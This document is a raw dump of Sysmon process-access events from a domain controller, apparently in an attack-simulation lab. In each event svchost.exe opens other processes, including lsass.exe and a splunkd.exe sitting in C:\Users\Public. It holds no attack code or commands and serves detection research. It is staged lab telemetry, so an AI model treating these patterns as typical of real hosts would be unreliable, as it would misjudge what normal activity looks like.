09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052368Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1500-00000000FC01}1216C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052367Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052366Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1300-00000000FC01}676C:\Windows\system32\dwm.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052365Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1200-00000000FC01}492C:\Windows\System32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052364Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1100-00000000FC01}404C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052363Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1000-00000000FC01}380C:\Windows\System32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052362Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052361Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-0E00-00000000FC01}984C:\Windows\system32\LogonUI.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052360Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-0D00-00000000FC01}888C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052359Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052358Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0900-00000000FC01}564C:\Windows\system32\winlogon.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+2210c|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052357Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-8C89-6151-6E7A-00000000FC01}7036C:\Windows\system32\DllHost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052356Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7FBB-614D-8500-00000000FC01}3904C:\Windows\System32\msdtc.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052355Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F53-614D-7700-00000000FC01}2312C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052354Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052353Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F42-614D-4700-00000000FC01}3700C:\Windows\system32\conhost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052352Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F42-614D-4400-00000000FC01}3648C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052351Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F41-614D-3700-00000000FC01}3368C:\Windows\system32\conhost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052350Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-3300-00000000FC01}3180C:\Windows\System32\vds.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052349Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-3100-00000000FC01}2212C:\Windows\system32\wbem\unsecapp.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052348Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-3000-00000000FC01}1812C:\Windows\system32\dfssvc.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052347Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\system32\dns.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052346Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2E00-00000000FC01}2456C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052345Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052344Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2C00-00000000FC01}3028C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052343Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2B00-00000000FC01}3008C:\Windows\system32\DFSRs.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052342Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2A00-00000000FC01}3000C:\Windows\System32\ismserv.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052341Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052340Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2700-00000000FC01}2888C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052339Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2500-00000000FC01}2788C:\Windows\System32\spoolsv.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052338Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F39-614D-2300-00000000FC01}2624C:\Windows\System32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052337Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F37-614D-2200-00000000FC01}2548C:\Windows\system32\conhost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052336Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F37-614D-2100-00000000FC01}2540C:\Users\Public\splunkd.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052335Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F31-614D-1F00-00000000FC01}2096C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052334Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1700-00000000FC01}1448C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052333Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.697{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052332Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 